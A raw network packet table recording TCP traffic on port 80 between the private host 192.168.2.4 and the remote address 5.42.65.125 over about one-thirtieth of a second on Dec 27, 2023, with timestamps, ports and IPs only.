Dec 27, 2023 18:12:24.981775045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982244015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982397079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982409000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982420921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982439041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.982467890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.982537031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982547998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982559919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982580900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.982598066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.982676983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982814074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982825994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.982848883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.983551025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983562946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983572960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983586073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983596087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.983597040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983608961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983619928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983633995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.983649969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.983660936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.983680010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.984452963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984761953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984812975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.984908104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984920025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984930992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984942913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984954119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.984955072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.984972954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.984988928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.985049009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985474110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985487938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985517979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.985614061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985625982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985636950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985649109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985661030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.985661983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.985690117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.985703945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.985733986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986296892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986314058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986350060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.986437082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986449957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986462116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986469984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.986505032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.986618042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986629963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986640930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.986665010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.987106085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987119913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987131119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987142086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987153053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987170935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.987199068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.987230062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987241983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987253904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987297058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.987922907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987936020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987951994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.987971067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988004923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988054037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988065958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988078117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988089085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988101959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988128901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988193989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988207102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988219023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988256931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988914013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988925934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988936901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988948107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.988961935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.988992929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.989038944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989052057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989063025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989097118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.989113092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.989181042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989871025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989883900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.989926100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990008116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990020037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990040064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990178108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990190029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990200043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990211964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990220070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990236044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990747929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990881920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990895033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990906000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990916967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.990921974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990947962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.990962029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991020918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991033077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991043091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991075039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991677046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991688013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991698980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991709948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991713047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991720915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991744995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991765976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991811991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991823912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991836071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991854906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.991947889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.991977930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.992698908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992708921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992724895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992736101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992748022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992749929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.992759943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992772102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.992794037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.992815971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992826939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992839098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.992873907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.994460106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994472027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994483948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994497061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994510889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.994525909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.994596004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994609118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994621038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994648933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.994669914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.994736910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994748116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.994785070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999505043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999516010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999527931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999540091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999581099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999597073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999634027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999645948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999663115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999680996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999761105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999773979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999784946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999795914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999797106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999808073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999818087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999819994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999831915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999841928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999851942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999854088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999866009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.999874115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.999912024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000083923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000096083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000107050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000118017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000128984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000132084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000140905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000152111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000161886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000164032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000171900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000173092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000184059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000185966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000220060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000389099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000401020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000412941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000425100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000436068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000436068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000454903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000482082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000509977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000642061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000653028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000663042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.000686884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.000703096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.001327991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001463890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001476049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001487017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001498938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001517057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.001557112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.001862049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001873970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001885891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.001914024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.001928091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.002041101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002053022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002063990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002074957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002087116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002099037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002100945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.002135992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.002147913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.002907038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002919912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002931118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002942085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.002981901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.003016949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.003103018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.003115892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.003160000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.003171921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.003334999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.003346920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.003385067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004089117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004101038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004112005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004123926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004129887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004134893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004164934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004199028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004252911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004264116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004275084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004287004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.004302025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004328012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.004942894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005093098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005109072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005131006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.005232096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005244017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005254984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005265951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005270004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.005276918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005289078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.005290031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.005312920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007181883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007234097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007299900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007318020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007329941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007353067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007443905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007455111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007467985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007488012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007520914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007577896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007591963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007602930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007615089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007625103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007630110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007637978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007649899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007662058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007683039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007699966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007713079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007735014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007900953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007915020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007925034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007936954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007941008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007947922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007958889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007966042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.007972002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.007991076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.008013010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.008622885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008635044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008646965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008657932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008666992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.008704901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.008778095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008796930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008809090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008821011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008832932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.008837938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.008851051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009171009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009183884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009193897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009205103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009207964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009216070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009227037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009238958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009239912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009249926 CET	80	49738	5.42.65.125	192.168.2.4
